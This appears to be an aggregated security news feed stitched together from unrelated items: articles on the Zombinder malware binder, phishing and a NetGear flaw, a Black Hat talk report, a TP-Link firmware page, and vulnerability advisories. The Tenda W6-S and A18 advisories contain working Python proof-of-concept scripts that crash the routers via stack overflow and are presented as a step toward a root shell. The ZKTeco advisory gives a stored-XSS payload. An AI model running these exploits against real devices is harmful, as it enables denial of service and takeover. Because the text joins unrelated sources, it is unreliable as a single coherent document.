By Deeba Ahmed
At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services.
This is a post from HackRead.com Read the original post: Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

ThreatFabric’s security researchers have reported a new **dark web** platform through which cybercriminals can easily add malware to legitimate Android applications.

Dubbed Zombinder, this platform was detected while investigating a campaign in which scammers were distributing multiple kinds of **Windows and Android malware**, including Android banking malware like Ermac, Laplas “clipper,” Erbium, and the Aurora stealer, etc.

This comes just days after a new dark web marketplace called **InTheBox** surfaced online, serving smartphone malware developers and operators.

Further probe helped researchers trace the adversary to a third-party dark web service provider called Zombinder. It was identified as an app programming interface binding service launched in March 2022.

According to ThreatFabric’s **blog post**, numerous different threat actors are using this service and advertising it on hacker forums. On one such forum, the service was promoted as a universal binder that binds malware with almost any legitimate app.

The campaign is designed to appear as it helps users access internet points by imitating the WiFi authorization portal. In reality, it pushes several different malware strains.

**What does Zombinder Do?**

In the campaign detected by ThreatFabric’s researchers, the service is distributing the **Xenomorph banking malware** disguised as the VidMate app. It is distributed via modified apps advertised/downloaded from a malicious website mimicking the application’s original website. The victim is lured to visit this site via malicious ads.

The Zombinder-infected app works just as it is marketed while the malicious activity carries on in the background and the victim stays unaware of the malware infection.

At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services. Those who downloaded **the infected Windows app** were delivered the Erbium stealer as well. It is an infamous Windows malware distributed to steal stored passwords, cookies, credit card details, and cryptocurrency wallet data.

It is worth noting that two downloaded buttons on the malicious website’s landing page, one for Windows and the other for Android. when a user clicks on the Download for Windows button, they are delivered malware designed for Microsoft operating system, including Aurora, Erbium, and Laplas clipper. Conversely, the Download for Android button distributes the **Ermac malware**.

**How to Stay Protected?**

If you want to stay safe, do not sideload apps even if you are desperate to make a specific product work. Also, avoid installing apps from unauthentic or unknown sources onto your Android mobile phone and rely on legitimate sources such as Google Play Store, Amazon Appstore, or Samsung Galaxy Store. Always check the app’s rating, and reviews, and check out the app developers’ website before installing a new app.

1.  **Psst! tool lets users share passwords using a link**
2.  **Chinese Hackers Hiding Malware in Windows Logo**
3.  **Trojan Source attack lets hackers exploit source code**
4.  **Android apps on Play Store infected with Windows malware**
5.  **Spyware Vendor Exploited Chrome, Firefox and Windows 0-days**

Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

ZKTeco Xiamen Information Technology ZKBio ECO ADMS <=3.1-164 is vulnerable to Cross Site Scripting (XSS).

**ZKT Eco ADMS - Stored XSS**

 Hi All,

I was able to identify stored XSS in one online attendance system i.e. ZKT Eco ADMS (v 3.1-164 )(Automatic Data Master Server) is a powerful web-based time and attendance management software. which is used to configure the attendance devices and manage its users.

Cve ID assigned CVE-2022-44213: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44213

Technical details

1.  Login to ZKT Eco ADMS (default admin/admin)
2.  Click on System and click on Employee
3.  Click on Append button to add new Employee
4.  In Emp Name field Add your XSS payload. For testing I have used a non malicious code **"/><img src=a onerror=alert('stored-XSS');>**
5.  Click on Submit button, it will redirect you to the employee list, and our payload will be executed.

_XSS payload embedded in EMP NAME field._

_our payload executed successfully._

XSS has been fixed in latest versions after 3.1-164.

**Popular posts from this blog**

**Ericsson BSCS iX R18 Billing & Rating (ADMX, MX) - Stored XSS**

Dear Reader, I was able to identify stored XSS in multiple web base modules of Ericsson BSCS iX R18 Billing & Rating platform  Below are its details: # Software description: Ericsson Billing is a convergent billing solution for telecoms that combines an unrivaled combination of out-of-the box features and high configurability. As an evolution of the widely-installed Ericsson BSCS iX, Ericsson Billing provides a low-risk but effective route to capture and secure revenue streams and take advantage of business opportunities from both traditional telecom services as well as digital services, 5G and IoT. # Technical Details & Impact: There are multiple web base modules in BSCS iX e.g. ADMX, MX (monitoring center), CX etc. It was observed that ADMX and MX are vulnerable to stored XSS, In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover, or exploiting admin's browsers using beef

**Autoconfiguration ipv4 address 196.254.x.x IP Problem**

Today when i connect my laptop to Lan it wasn't getting the ip from my DHCP server. Instead it gives me some weird IP like 196.254.x.x . while my Wifi was working fine, I searched Alot to get to know until i found a great piece of code on a blog. so going to share with you guys. Problem with my Ip. Steps to follow: If you are Using any Firewall disable it (like i use comodo so i disable it temporary) Click on start and click on RUN (or simple press windowsKey+R ) type CMD   Now type the below Codes  netsh interface ipv4 show inter It will show like this.  As we have problem in LAN so my LAN here is Local Area Connection  and Its Idx=11 (we will use this idx number in next code) Now type in this code and replace your Idx number, as mine is 11    netsh interface ipv4 set interface 11 dadtransmits=0 store=persistent   It will show like this.  If it says OK. Congratulations you have done the difficult part Now Click on Start and Run again and Type Servic

**CSV Injection in Acunetix version 13.0.201217092**

 Hi all,  I was using Acunetix version 13.0.201217092 for scanning purposes back in Jan 2021, and I was able to identify CSV Injection vulnerability in the web scanner. Any user who is not the administrator can perform these actions which can lead to admin system compromise. For testing I used the Admin account. Lets get to the technical details. CVE ID Assigned:  CVE-2022-29315  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29315 https://www.cve.org/CVERecord?id=CVE-2022-29315 Vulnerable Version: Before version 14 Fixed Version: 14 and 14+ # Software description: Acunetix by Invicti Security is an application security testing tool built to help small & mid-size organizations around the world take control of their web security. # Technical Details & Impact: It was observed that Target page is vulnerable to CSV Injection, using CSV injection; Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilitie

CVE-2022-44213: ZKT Eco ADMS - Stored XSS

By Owais Sultan
A phishing scam is not only about stealing your login credentials, but it can also install malware, including ransomware, which is why it is essential to learn how to tackle this growing threat.
This is a post from HackRead.com Read the original post: Phishing Scams: How To Recognize A Scam Email, VOIP call, or Text

The number of phishing scams reported in the first quarter of 2022 **set a new record** of over one million total attacks, according to a report by the Anti-Phishing Working Group.

And the scams have been growing fast in recent years. The number of attempts reported in the first quarter of 2022 is more than triple the average numbers just two years before, in early 2020.

With so many attacks underway—and growing by the day—what’s the best way to recognize these scams and prevent them? We’ll look at how to recognize and protect yourself from the most common types of phishing fraud. Meanwhile, you can also learn **how to detect phishing images in an email**.

**Most prevalent types of phishing scams**

Phishing today refers to a type of scam that steals people’s personal information by posing as a trusted third party. For example, a scammer might pretend to be a government worker to get you to share your Social Security number or pretend to be from your bank to get you to share account details.

With so many communication channels today, there are more phishing methods than ever before. And scammers have adapted to each type of channel by leveraging trust signals inherent to each one.

This can make it hard for the untrained eye to spot a phishing scam and even difficult to recognize **if you’ve been hacked** after falling for an attack. The first sign that tips off most victims is an unexpected charge, damaged credit score, or depleted bank account.

Here are the six most common types of phishing scams and how to protect yourself.

**1\. Email scams**

Anyone can fall for an email scam; **this U.S. judge did**. By far the most common type of phishing attack is via email. You’re probably familiar with the spam emails we all get on a day-to-day basis, but the most sophisticated phishing attacks look very different.

These emails often look identical to official messages and notifications, including the company’s logo and exactly the same content as a real message. For example, one of today’s most common scams is a message notification from LinkedIn that’s almost impossible to tell apart from the real thing.

**How to protect yourself:**

*   Never click on links in emails. Instead, visit the official site.
*   Beware of email addresses that aren’t from the business domain, especially if the address is from a free provider like Gmail.
*   Disable automatic image loading, as this can let scammers know you’ve seen the message.

**2\. Voice phishing (vishing)**

Another common method fraudsters use to trick victims is over the phone. These calls usually claim to have a one-of-a-kind offer or urgent, life-threatening warning.

Most scammers use a VoIP phone system that lets them change the phone number, meaning the call appears as though it’s from a local number even if it’s not.

**How to protect yourself:**

*   Never answer calls from numbers you don’t recognize, even if it has a local area code.
*   Don’t return calls from numbers. you don’t recognize (one type of scam collects expensive per-dial and per-minute fees, hoping you’ll call back).
*   Remember that most U.S. government agencies, including the IRS, Medicare, and the Social Security Administration, almost never call by phone and do not have the power to arrest you.

**3\. Phishing websites**

One of the most common destinations for phishing scams is a fraudulent site that looks like the official website. The cloned site will often be identical to the real page, using the company’s logos, color scheme, and fonts.

After establishing trust with the design, the site will ask you to share personal information, anything from your email and password to your Social Security number or bank account details. For example, this **attack impersonating American Express** used an email message and web page almost impossible to tell apart from the real brand.

Phishing email and the phishing page (Screenshots via Armorblox)

**How to protect yourself:**

*   If you get a message with a link—even if it looks trustworthy—go to the official site instead.
*   Check the URL of a website to make sure it’s correct. (You’ll notice the American Express phishing page above comes from a site other than AmericanExpress.com.)
*   Don’t automatically trust an HTTPS connection. The “green padlock” icon is an important trust signal, but it doesn’t mean a site is safe. Hackers can use them on phishing sites, too.

**4\. SMS text message scams (smishing)**

Text messages don’t have much space for the scammer’s message, but that hasn’t stopped criminals from trying new tactics to trick innocent victims. The goal of most **SMS scams** is to get you to click on a link or make a call, so immediately be suspicious of any message with a link or number (though of course, some legitimate messages have these as well).

One of the most common ruses right now with text scams is, ironically enough, helping to protect you from scams. You’ll often see a message “confirming” an expensive purchase or withdrawal, directing you to a number or link to cancel or investigate. There is nothing to cancel or investigate, but the scammer will pretend to resolve the situation by collecting your personal data for a future attack.

**How to protect yourself:**

*   Don’t trust texts from numbers you don’t recognize. Instead, visit the official site.
*   Beware of texts that use vague terms like “your bank” or “package service.” Scammers use these (instead of actual company names) so the message can apply to anyone.
*   Don’t reply to scam messages, even unsubscribe. This only confirms you have an active number and will result in more attacks.

Social media has become one of the more recent additions to the phishing repertoire. Scammers reach out either using a fake lookalike account or a compromised account.

One common ruse is a friend reaching out for help, usually with an authentication code. But it’s not a friend—it’s a scammer who’s taken over their account and is trying to take over yours. Another ruse is a message from someone posing as the **official company support account**, asking you to provide information to verify you’re the authentic owner or to keep your page active.

Fake Support chatbot (Image: Trustwave)

**How to protect yourself:**

*   Beware of anyone who reaches out and asks for personal information or verification codes, even if they appear to be coming from a friend.
*   Don’t respond to messages from “official” accounts. If you’ve received an alert from the social networking site, it’ll usually appear in your account settings.
*   Don’t ever share your social media password with a third-party website.

**6\. Man-in-the-middle attack**

This type of phishing scam requires the attacker to be nearby but can be one of the most dangerous because it’s almost impossible to detect. It works when you and the attacker are on the same Wi-Fi network, **like at a coffee shop** or airport. The attacker intercepts everything you send and receive and can redirect your browser to safe sites to look-alike sites without you knowing.

Once the attacker has set up a man-in-the-middle attack, they can see almost all the information you share, including usernames, passwords, credit card details, and more.

**How to protect yourself:**

*   Never use public Wi-Fi networks. A better option is to connect to a hotspot from your cell phone, which has a secure and private connection.
*   If you have to use public Wi-Fi, turn on a VPN. This can protect you against most types of man-in-the-middle attacks and safeguard your personal details.

**How to prevent phishing**

Every type of phishing requires a slightly different method to spot, and scammers are constantly developing new methods that leverage our weaknesses. But there are a few common warning signs you can look for across different types of phishing attacks.

*   **Unfamiliar senders.** Emails, texts, or calls from people you don’t recognize are automatically suspect.
*   **Poor spelling or grammar.** Major corporations pay careful attention to small details like this. Scammers, on the other hand, don’t usually worry about a few typos and often use poor English.
*   **Urgency and threats.** Scammers demand immediate action or scare you using intimidation tactics, like arrest or deportation, so you don’t recognize warning signs of a scam.
*   **Unusual payment methods.** Phishing scams often take the opportunity to charge a “fee” for a service but will only accept forms of payment like gift cards, money orders, or cryptocurrency. Legitimate businesses use other methods.

**What to do if you’re a victim of phishing**

You’ve learned how to protect yourself from phishing scams, but what if you’ve already fallen victim? If you know you’ve shared information with a scammer, **here’s what you should do**, based on what information you’ve shared.

*   **Credit or debit card details.** Call the issuing company and have the card canceled immediately. Ask to reverse or dispute any fraudulent charges.
*   **Login details or passwords.** Log into the compromised account, change the password, look for an option to close all active sessions, and add two-factor authentication if possible. Do the same for any other accounts using the same password.
*   **Medical insurance information.** Call your insurance company and any impacted companies, explain the fraud, and dispute any fraudulent charges.
*   **Social Security number.** Set up a credit freeze at each of the three credit bureaus (Experian, Equifax, and TransUnion). This prevents anyone from requesting credit in your name.
*   **Name, email, date of birth, or other information.** Keep a close eye on your accounts for signs of identity theft.

No matter what kind of information you’ve shared, it’s always a good idea to report the fraud to the Federal Trade Commission at **IdentityTheft.gov**. Filing the report helps protect others, gives you documentation of the attack, and will provide you with recovery steps specific to your situation

**Conclusion**

Phishing attacks are on the rise, and scammers are developing even more intricate scams all the time. But if you know the most common warning signs and stay vigilant, you can protect yourself and take quick action in case you’ve been compromised.

1.  **WhatsApp OTP Scam Allows Crooks to Hijack Your Account**
2.  **Scammers Made Deepfake AI Hologram of Binance Executive**
3.  **16,000 Scam Domains Aimed at FIFA World Cup Fans in Qatar**
4.  **Phishing Scam: Hackers Steal $11M from Canadian University**
5.  **Scammers Use AI-Generated Images to Represent Fake Law Firm**

Phishing Scams: How To Recognize A Scam Email, VOIP call, or Text

Researchers have shed light on a new hybrid malware campaign targeting both Android and Windows operating systems in a bid to expand its pool of victims.
The attacks entail the use of different malware such as ERMAC, Erbium, Aurora, and Laplas, according to a ThreatFabric report shared with The Hacker News.
"This campaign resulted in thousands of victims," the Dutch cybersecurity company said,

Mobile Security / Android Malware

Researchers have shed light on a new hybrid malware campaign targeting both Android and Windows operating systems in a bid to expand its pool of victims.

The attacks entail the use of different malware such as ERMAC, Erbium, Aurora, and Laplas, according to a ThreatFabric report shared with The Hacker News.

"This campaign resulted in thousands of victims," the Dutch cybersecurity company said, adding, "Erbium stealer successfully exfiltrated data from more then 1,300 victims."

The ERMAC infections commence with a fraudulent website that claims to offer Wi-Fi authorization software for Android and Windows that, when installed, comes with features to steal seed phrases from crypto wallets and other sensitive data.

ThreatFabric said it also found a number of malicious apps that were trojanized versions of legitimate apps like Instagram, with the operators using them as droppers to deliver the obfuscated malicious payload.

The rogue apps, dubbed Zombinder, are said to have been developed using an APK binding service advertised on the dark web by a well-known threat actor since March 2022.

Such zombie apps have been used to distribute Android banking trojans like SOVA and Xenomorph targeting customers in Spain, Portugal, and Canada, among others.

Interestingly, the download option for Windows on the booby-trapped website distributing ERMAC is designed to deploy the Erbium and Aurora information stealers on the compromised system.

Erbium, which is a malware-as-a-service (MaaS) licensed for $1,000 per year, not only steals passwords and credit card information, but has also been observed acting as a conduit to drop the Laplas clipper that's used to hijack crypto transactions.

"The presence of such a wide variety of trojans might also indicate that the malicious landing page is used by multiple actors and provided to them as a part of a third-party distribution service," the researchers theorized.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Darknet Service Allowing Hackers to Trojonize Legit Android Apps

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the wl_radio parameter at /goform/WifiMacFilterGet.

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiMacFilterGet, when wl\_radio is 0, the index will be spliced into v6 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/WifiMacFilterGet'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'wl\_radio=0&index=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45499: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the wl_radio parameter at /goform/wifiSSIDset.

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/wifiSSIDset, when wl\_radio is 0, the index will be spliced into v24 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/wifiSSIDset'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'wl\_radio=0&index=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45501: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda A18 v15.13.07.09 was discovered to contain a stack overflow via the security_5g parameter at /goform/WifiBasicSet.

Permalink

Cannot retrieve contributors at this time

**Tenda A18 V15.13.07.09 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address: https://www.tenda.com.cn/download/detail-2760.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiBasicSet, the user can control security\_5g, which will be copied to param\_5g by the strcpy function. It is worth noting that there is no size check, which leads to a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'security\_5g=' + p1

p3 \= b"POST /goform/WifiBasicSet" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44931: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Categories: Exploits and vulnerabilities
Categories: News
Tags: NetGear

Tags:  Nighthawk

Tags:  remote

Tags:  ports

Tags:  IPv6

NetGear has issued a hotfix that has to be installed manually, after researchers found a vulnerability that could allow remote attacks.



(Read more...)




The post Update now! NetGear routers’ default configuration allows remote attacks appeared first on Malwarebytes Labs.

NetGear has made a hotfix available for its Nighthawk routers after researchers found a network misconfiguration in the firmware allowed unrestricted communication with the internet facing ports of the device listening through IPv6.

**No auto-update**

The hotfix is available for the model RAX30, also known as the Nighthawk AX5 5-Stream AX2400 WiFi 6 Router.

_The NetGear Nighthawk RAX 30 (image courtesy of NetGear)_

To update your router’s firmware, follow the instructions in your router’s user manual, which can be found online.

Important to note is that having the “check for updates” or even the auto-update options enabled is not sufficient to get this hotfix. It needs to be downloaded manually and applied following the instructions.

What other security vulnerabilities were fixed in this hotfix or in the newer 1.0.9.92 hotfix, which also addresses security vulnerabilities, is unknown at this point.

**Popular**

The researchers found the bug while looking to enter Pwn2Own Toronto. The NetGear Nighthawk RAX30 is a popular model for home users and small businesses, which is one of the reasons why it was selected as a target for the Pwn2Own contest. Contestants set out to find previously unknown vulnerabilities in widely used software and mobile devices.

NetGear frustrated a lot of participants by issuing the 1.0.9.90 hotfix one day before the registration deadline for Pwn2Own. The patch invalidated the submission of this vulnerability and, it seems, some others as well.

**The vulnerability**

The vulnerability found by the researchers and patched just before the deadline, allowed unrestricted communication with any services listening via IPv6 on the WAN (internet facing) port of the device, including SSH and Telnet operating on ports 22 and 23 respectively.

Telnet is an application protocol used on the internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection.

Secure Shell (SSH) is a network communication protocol that enables two computers to communicate and share data.

Although the researchers shared no further details  about their attack chain that was crippled by the patch, having telnet and SSH available makes it very likely they could have reconfigured the router, stolen data, or at least put it out of service.

Stay safe, everyone!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Update now! NetGear routers’ default configuration allows remote attacks

Security researchers share their biggest initial screwups in some of their key vulnerability discoveries.

BLACK HAT EUROPE 2022 – London – Researcher Douglas McKee was having no luck extracting the passwords in a medical patient-monitor device he was probing for vulnerabilities. The GPU password-cracking tool he had run to lift the layers of credentials needed to dissect the device came up empty. It wasn't until a few months later when he sat down to read the medical device's documentation that he discovered that the passwords had been right there in print the whole time.

"I finally got around reading the documentation, which clearly had all the passwords in plaintext right in the documents," McKee, director of vulnerability research at Trellix, recounted in a presentation here today. It turned out the passwords were hardcoded into the system as well, so his failed password-cracking process was massive overkill. He and his team later discovered bugs in the device that allowed them to falsify patient information on the monitor device.

Failing to pore over documentation is a common misstep by security researchers eager to dig into the hardware devices and software they are studying and reverse-engineering, according to McKee. He and his colleague Philippe Laulheret, senior security researcher at Trellix, in their "Fail Harder: Finding Critical 0-Days in Spite of Ourselves" presentation here, shared some of their war stories over mistakes or miscalculations they made in their hacking projects: mishaps that they say serve as useful lessons for researchers.

"At all conferences we go to \[they\] show the shiny results" and successes in security research like zero-days, Laulheret said. You don't always get to hear about the strings of failures and setbacks along the way when sniffing out vulns, the researchers said. In their case, that's been everything from hardware hacks that burned circuit boards to a crisp, to long-winded shellcode that failed to run.

In the latter case, McKee and his team had discovered a vulnerability in the Belkin Wemo Insight SmartPlug, a Wi-Fi-enabled consumer device for remotely powering on and off devices connected to it. "My shellcode was not getting through to the stack. If I had read the XML library, it was clear that XML filters out characters and there's a limited character set allowed through the XML filter. This was another example of lost time if I had read through the code I was actually working with," he says. "When we deconstructed it, we found a buffer overflow that allowed you to remotely control the device."

**Don't ASSume: Schooled by Distance-Learning App 'Security'**

In another project, the researchers studied a distance-learning software tool by Netop called Vision Pro that, among other things, includes the ability for teachers to remote into students' machines and exchange files with their students. The Remote Desktop Protocol-based feature seemed straightforward enough: "It allows teachers to log in using Microsoft credentials to get full access to a student's machine," McKee explained.

The researchers had assumed that the credentials were encrypted on the wire, which would have been the logical security best practice. But while monitoring their network captures from Wireshark, they were shocked to discover credentials traveling across the network unencrypted. "A lot of times assumptions can be the death of the way you do a research project," McKee said.

Meantime, they recommend having in hand multiple versions of a product you're researching in case one gets damaged. McKee admitted getting a bit overzealous in deconstructing the battery and internals of the B Bruan Infusomat infusion pump. He and his team took apart the battery after spotting a MAC address on a sticker affixed to it. They found a circuit board and flash chip inside, and they ended up physically damaging the chip while trying to get to the software on it.

"Try to do the least invasive process first," McKee said, and don't jump into breaking open the hardware from the start. "Breaking things is part of the hardware hacking process," he said.

Hacker Fails for the Win

tdpServer of TP-Link RE300 V1 improperly processes its input, which may allow an attacker to cause a denial-of-service (DoS) condition of the product's OneMesh function.

**Setup Video**

*   **How to Setup OneMesh Service using a Web Browser**
    
    This video will show you the process for using the web browser of your computer to setup TP-Link's OneMesh service.
    
    More Fold
    
*   **RE300 Installation Guide through WPS Button**
*   **RE300 Installation Guide through Tether APP**
*   **RE300 Installation Guide through Web UI**
*   **How to setup a TP-Link Range Extender via WPS**
*   **How to set up a TP-Link Range Extender(No music)**
*   **How to set up a TP-Link Range Extender**

**Firmware**

A firmware update can resolve issues that the previous firmware version may have and improve its current performance.

**To Upgrade**

**IMPORTANT:** To prevent upgrade failures, please read the following before proceeding with the upgrade process

*   **Please upgrade firmware from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it will be against the warranty. Please click here to change site if necessary.**
*   Please verify the hardware version of your device for the firmware version. Wrong firmware upgrade may damage your device and void the warranty. (**Normally Vx.0=Vx.6/Vx.8 (eg:V1.0=V1.6/V1.8);   Vx.x0=Vx.x6/Vx.x8 (eg:V1.20=V1.26/V1.28)**  
    How to find the hardware version on a TP-Link device
*   **Do NOT turn off the power during the upgrade process, as it may cause permanent damage to the product.**
*   To avoid wireless disconnect issue during firmware upgrade process, it's recommended to upload firmware with wired connection unless there is no LAN/Ethernet port on your TP-Link device.
*   It's recommended that users stop all Internet applications on the computer, or simply disconnect Internet line from the device before the upgrade.
*   Use decompression software such as WinZIP or WinRAR to extract the file you download before the upgrade.

More Fold

RE300\_V1\_221009

Download

Published Date: 2022-10-10

Language: English

File Size: 7.92 MB

Enhanced system stability.

RE300(EU)\_V1\_211126

Download

Published Date: 2021-12-13

Language: English

File Size: 8.03 MB

Note:

Enhanced system stability;

Optimized Wi-Fi compatibility;

Enhanced Wi-Fi performance;

Optimized the OneMesh stability;

Fixed a few UI related bugs;

Fixed the RE's security vulnerabilities;

RE300(EU)\_V1\_210129

Download

Published Date: 2021-03-25

Language: Multi-language

File Size: 8.09 MB

Release Note:  
1\. Performance improvements (onemesh and WPS)  
2\. Improve the stability of the device in DFS channel

**To Use Third Party Firmware In TP-Link Products**

Some official firmware of TP-Link products can be replaced by the third party firmware such as DD-WRT. TP-Link is not obligated to provide any maintenance or support for it, and does not guarantee the performance and stability of third party firmware. Damage to the product as a result of using third party firmware will void the product's warranty.

**Open Source Code For Programmers (GPL)**

Please note: The products of TP-Link partly contain software code developed by third parties, including software code subject to the GNU General Public Licence (“GPL“), Version 1/Version 2/Version 3 or GNU Lesser General Public License ("LGPL"). You may use the respective software condition to following the GPL licence terms.

You can review, print and download the respective GPL licence terms here. You receive the GPL source codes of the respective software used in TP-Link products for direct download and further information, including a list of TP-Link software that contain GPL software code under GPL Code Center.

The respective programs are distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the respective GNU General Public License for more details.

**Apps**

TP-Link Tether

TP-Link Tether provides the easiest way to access and manage your network with your iOS or Android devices. Learn more about TP-Link Tether and Compatible Devices

*   
*   

Note: To use Tether, please update your TP-Link device’s firmware to the latest version.

**Emulators**

Firmware Version

Working Mode

Language

181212(EU)

\-

Multi-language

Browse

**Note:**

1\.  The emulator is a virtual web GUI where you can experience the TP-Link product management panel.

2\. The listed emulators might not have the latest firmware.

3\.  The features displayed are for reference, and their availability may depend on local regulations. For more information, please refer to the datasheet or product page.

Tag

#wifi